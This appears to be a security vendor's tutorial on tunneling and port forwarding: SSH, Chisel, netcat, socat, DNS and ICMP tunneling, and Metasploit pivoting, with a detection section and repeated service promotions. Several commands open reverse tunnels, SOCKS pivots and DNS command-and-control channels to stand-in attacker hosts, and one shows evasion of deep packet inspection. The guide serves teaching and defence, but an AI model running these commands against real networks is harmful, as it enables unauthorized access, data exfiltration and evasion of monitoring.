Tunneling and Port Forwarding Explained

Network tunneling and port forwarding are foundational techniques in both offensive security and legitimate systems administration. Whether you are bypassing restrictive firewall rules, pivoting through compromised networks, or securely exposing internal services, understanding how these mechanisms work at a technical level is essential.

This guide breaks down the core concepts, real-world usage, and security implications of tunneling and port forwarding, with practical commands you can reference directly.

What Is Port Forwarding and Why Does It Matter

Port forwarding is the process of redirecting traffic from one IP address and port combination to another. It allows services running on internal or otherwise inaccessible hosts to be reached through an intermediary.

There are three primary types:

• Local Port Forwarding forwards a port on your local machine to a remote destination through a relay host.
• Remote Port Forwarding exposes a port on the remote server back to a local machine or internal network.
• Dynamic Port Forwarding turns an SSH connection into a SOCKS proxy, routing all traffic dynamically through the tunnel.

These techniques are used every day by developers, system administrators, and penetration testers alike. When misused, they also form a critical component of post-exploitation and lateral movement in adversarial environments.

SSH Tunneling: The Most Common Tunneling Method

SSH (Secure Shell) is the most widely used protocol for tunneling because it is encrypted, available on nearly every Unix-based system, and highly flexible.

Local Port Forwarding with SSH

The following command forwards local port 8080 to port 80 on an internal server, routed through a jump host:

ssh -L 8080:192.168.1.100:80 user@jump-host.example.com -N


[cta]

Breaking this down:

• -L 8080:192.168.1.100:80 binds local port 8080 and forwards it to 192.168.1.100:80
• user@jump-host.example.com is the SSH relay host
• -N tells SSH not to execute a remote command, keeping the tunnel alive without an interactive shell

After running this, visiting http://localhost:8080 in your browser will load the content from 192.168.1.100:80 as seen from the jump host.

Remote Port Forwarding with SSH

Remote forwarding is particularly powerful in penetration testing scenarios where you need to expose an internal service to an external attacker-controlled machine:

ssh -R 9090:localhost:3306 attacker@attacker.example.com -N


[cta]

This command opens port 9090 on the remote attacker machine and tunnels it back to port 3306 (MySQL) on the local machine. This is commonly used during red team engagements to access database services that are otherwise unreachable from the internet.

Dynamic Port Forwarding and SOCKS Proxy

Dynamic port forwarding creates a SOCKS5 proxy through the SSH connection:

ssh -D 1080 user@jump-host.example.com -N


[cta]

Once this is running, configure your browser or tool to use 127.0.0.1:1080 as a SOCKS5 proxy. This routes all traffic through the jump host, allowing full network access to the internal environment. Tools like proxychains can be configured to route command-line tools through this tunnel:

# /etc/proxychains.conf
socks5 127.0.0.1 1080


[cta]

Then run any tool through the proxy:

proxychains nmap -sT -Pn 192.168.1.0/24


[cta]

This is a common pivot technique during internal network assessments. If your organization needs a thorough review of how these techniques could be used against your environment, the team at Redfox Cybersecurity offers comprehensive penetration testing services at https://redfoxsec.com/services.

Chisel: Tunneling Over HTTP

In environments where SSH is blocked but HTTP or HTTPS traffic is allowed, Chisel is a popular tool for establishing tunnels. It operates as an HTTP-based tunnel with a client-server model.

Setting Up a Chisel Server

On the attacker or relay machine:

./chisel server --port 8000 --reverse


[cta]

The --reverse flag enables reverse tunneling from clients back to the server.

Connecting with the Chisel Client

On the compromised or internal host:

./chisel client http://attacker.example.com:8000 R:3389:127.0.0.1:3389


[cta]

This creates a reverse tunnel, exposing RDP (port 3389) from the internal machine to the attacker's Chisel server on port 3389. This technique is frequently observed during red team operations to pivot into Windows environments.

Chisel SOCKS Proxy

Chisel also supports dynamic SOCKS proxying:

# Server side
./chisel server --port 8000 --reverse

# Client side
./chisel client http://attacker.example.com:8000 R:socks


[cta]

This opens a SOCKS5 listener on port 1080 (by default) on the server side, allowing full network pivoting through the compromised host.

Netcat-Based Port Forwarding

Netcat (nc) is a simple but powerful utility available on most Linux systems. While it does not encrypt traffic, it is useful for quick, temporary port forwarding in controlled environments.

Basic Netcat Relay

mkfifo /tmp/pipe
nc -lvp 4444 < /tmp/pipe | nc 192.168.1.100 80 > /tmp/pipe


[cta]

This creates a bidirectional relay: traffic arriving on port 4444 is forwarded to 192.168.1.100:80 and responses are piped back. It is unencrypted and fragile, but effective for rapid prototyping or CTF-style scenarios.

Socat for Advanced Port Forwarding

socat is a more capable alternative to Netcat that supports SSL, file descriptors, and complex relays.

TCP Port Relay with Socat

socat TCP-LISTEN:8080,fork TCP:192.168.1.100:80


[cta]

The fork option ensures that each incoming connection spawns a new process, allowing multiple simultaneous connections through the relay.

SSL-Wrapped Tunnel with Socat

socat OPENSSL-LISTEN:443,cert=server.pem,verify=0,fork TCP:127.0.0.1:8080


[cta]

This wraps plaintext traffic in SSL, making it appear as HTTPS to any intermediate inspection device. This technique is often used to evade deep packet inspection (DPI) firewalls.

If your infrastructure may be vulnerable to tunneling-based evasion, Redfox Cybersecurity can assess your network defenses and firewall posture. Explore their services at https://redfoxsec.com/services.

DNS Tunneling: Exfiltration Through Port 53

DNS tunneling encodes data inside DNS query and response packets to bypass firewalls that allow DNS traffic unrestricted. It is one of the more covert tunneling techniques and is commonly associated with data exfiltration and command-and-control (C2) communication.

How DNS Tunneling Works

Tools like iodine and dnscat2 are commonly used to establish DNS tunnels.

Setting up an iodine server:

iodined -f -c -P secretpassword 10.0.0.1 tunnel.attacker.example.com


[cta]

Connecting with the iodine client:

iodine -f -P secretpassword tunnel.attacker.example.com


[cta]

Once the tunnel is established, a virtual network interface (dns0) is created on both ends, allowing arbitrary IP traffic to flow through DNS packets. This is stealthy because port 53 UDP is almost universally permitted through firewalls.

dnscat2 for Command and Control

dnscat2 is specifically designed for C2 over DNS:

# Server (on authoritative DNS server for your domain)
ruby dnscat2.rb tunnel.attacker.example.com

# Client (on compromised host)
./dnscat2 tunnel.attacker.example.com


[cta]

From the server, you get an interactive shell session through DNS. Traffic is encrypted by default using a pre-shared key, making it difficult to detect even with DNS logging in place.

ICMP Tunneling

ICMP (Internet Control Message Protocol) is another protocol frequently permitted through firewalls. Tools like ptunnel wrap TCP traffic inside ICMP echo request and reply packets.

# Server
ptunnel -x secretpassword

# Client
ptunnel -p server.example.com -lp 8080 -da 192.168.1.100 -dp 80 -x secretpassword


[cta]

This makes a connection to 192.168.1.100:80 appear as ICMP ping traffic to any monitoring system. ICMP tunneling has lower bandwidth and higher latency than TCP-based methods, but its stealthiness makes it a valuable technique in restricted environments.

Metasploit Port Forwarding During Post-Exploitation

During penetration tests using Metasploit Framework, port forwarding can be configured directly from a Meterpreter session to pivot deeper into a network:

# Inside a Meterpreter session
meterpreter > portfwd add -l 3306 -p 3306 -r 192.168.10.50


[cta]

This forwards local port 3306 to port 3306 on an internal host visible only from the compromised machine. After setting this up, tools like mysql can connect directly from the attacker machine:

mysql -h 127.0.0.1 -P 3306 -u root -p


[cta]

Metasploit also supports SOCKS proxying through a compromised host using the auxiliary/server/socks_proxy module:

msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVPORT 1080
msf6 auxiliary(server/socks_proxy) > set VERSION 5
msf6 auxiliary(server/socks_proxy) > run


[cta]

Combined with proxychains, this allows the attacker to route arbitrary tools through the compromised network segment, a technique central to internal network lateral movement.

Red team engagements that test these exact pivot and tunneling techniques are a core capability of Redfox Cybersecurity. Their adversary simulation services are available at https://redfoxsec.com/services.

Detecting and Defending Against Unauthorized Tunneling

Understanding how tunneling works also informs how to defend against it. Common detection and mitigation strategies include:

Network-Level Controls

Blocking outbound SSH (port 22) to arbitrary internet hosts limits opportunistic tunneling. Enforcing DNS resolution through internal resolvers and monitoring DNS query volume and entropy can surface DNS tunneling activity. Restricting ICMP to monitoring purposes only reduces ICMP tunnel viability.

Deep Packet Inspection

Modern next-generation firewalls (NGFWs) perform application-layer inspection that can detect SSH tunneling even when it uses port 443 or other permitted ports by analyzing handshake patterns and traffic behavior.

Endpoint Detection

Monitoring process trees and network socket activity on endpoints can reveal tools like Chisel, iodine, or dnscat2 running as unexpected processes. EDR solutions that capture network behavior at the process level are particularly effective here.

Logging and Anomaly Detection

Large volumes of DNS queries to a single external domain, ICMP packets with unusual payloads, or long-lived TCP sessions over unusual ports are all indicators that can be surfaced through SIEM correlation rules.

If you want an expert evaluation of how well your defenses hold up against real tunneling and evasion techniques, Redfox Cybersecurity provides detailed security assessments tailored to your environment at https://redfoxsec.com/services.

Key Takeaways

Tunneling and port forwarding are versatile, powerful techniques that sit at the intersection of legitimate network administration and advanced adversarial tradecraft. SSH tunnels, Chisel over HTTP, DNS and ICMP tunneling, and Metasploit pivoting each serve a distinct purpose and excel in different environmental constraints.

For defenders, the priority is understanding the techniques attackers use so that the right detection controls can be put in place. For penetration testers and red teamers, mastering these methods is non-negotiable for realistic internal assessments.

Whether you are hardening your network against tunneling-based attacks or need professionals to simulate exactly these techniques against your infrastructure, Redfox Cybersecurity has the expertise to help. Visit https://redfoxsec.com/services to learn more about their offensive and defensive security service offerings.